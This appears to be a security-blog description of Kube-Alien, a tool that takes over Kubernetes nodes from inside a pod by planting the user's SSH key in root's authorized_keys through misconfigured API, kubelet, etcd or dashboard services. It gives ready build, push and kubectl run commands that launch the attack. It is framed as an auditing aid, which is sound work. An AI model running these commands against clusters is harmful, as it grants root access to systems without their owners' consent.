Kube-Alien tool launches attack on k8s cluster from within. That means you already need to have an access with permission to deploy pods in a cluster to run it.
After running the kube-alien pod it tries to takeover cluster’s nodes by adding your public key to node’s /root/.ssh/authorized_keys file by using this image https://github.com/nixwizard/dockercloud-authorizedkeys (Can be adjusted using ADD_AUTHKEYS_IMAGE param in config.py) forked from docker/dockercloud-authorizedkeys.
Also Read – Firmware Analysis Toolkit : To Emulate Firmware And Analyse It For Security Vulnerabilities
The attack succeedes if there is a misconfiguration in one of the cluster’s components it goes along the following vectors:
- Kubernetes API
- Kubelet service
- Etcd service
- Kubernetes-Dashboard
The purpose of this tool
- While doing security audit of a k8s cluster one can quickly assess it’s security posture.
- Partical demostration of the mentioned attack vectors exploitation.
How can k8s cluster be attacked from within in a real life
- RCE or SSRF vunerability in an app which is being run in one of your cluster’s pods.
Kube-alien image should be pushed to your dockerhub(or other registry) before using with this tool.
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka
The AUTHORIZED_KEYS env required to be set to the value of your ssh public key, in case of success the public key will be added to all node’s root’s authorized_keys file.
kubectl run –image=YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka kube-alien –env=”AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)” –restart Never
or you may use my image for quick testing purpose:
kubectl run –image=nixwizard/kube-alien kube-alien:ka –env=”AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)” –restart Never
Check Kube-alien pod’s logs to see if attack was successful:
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d’ ‘)